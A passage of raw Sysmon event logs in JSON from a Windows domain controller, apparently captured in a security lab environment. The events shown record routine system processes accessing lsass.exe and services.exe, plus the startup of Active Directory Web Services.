06:49:15.311","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.311\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.311","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.324\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.324","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.324\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.324","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.324\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.324","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1182,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.324\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.324","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1183,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.325\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 2632\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-00102AC00200}\r\nTargetProcessId: 2500\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.325","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"2632","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-00102AC00200}","TargetProcessId":"2500","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1184,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.325\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-00102AC00200}\r\nTargetProcessId: 2500\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.325","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-00102AC00200}","TargetProcessId":"2500","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1185,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.315\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001072BF0200}\r\nProcessId: 2460\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nFileVersion: 10.0.14393.0\r\nDescription: Microsoft.ActiveDirectory.WebServices\r\nProduct: Microsoft (R) Windows (R) Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Microsoft.ActiveDirectory.WebServices.exe\r\nCommandLine: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.315","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001072BF0200}","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","FileVersion":"10.0.14393.0","Description":"Microsoft.ActiveDirectory.WebServices","Product":"Microsoft (R) Windows (R) Operating System","Company":"Microsoft Corporation","OriginalFileName":"Microsoft.ActiveDirectory.WebServices.exe","CommandLine":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
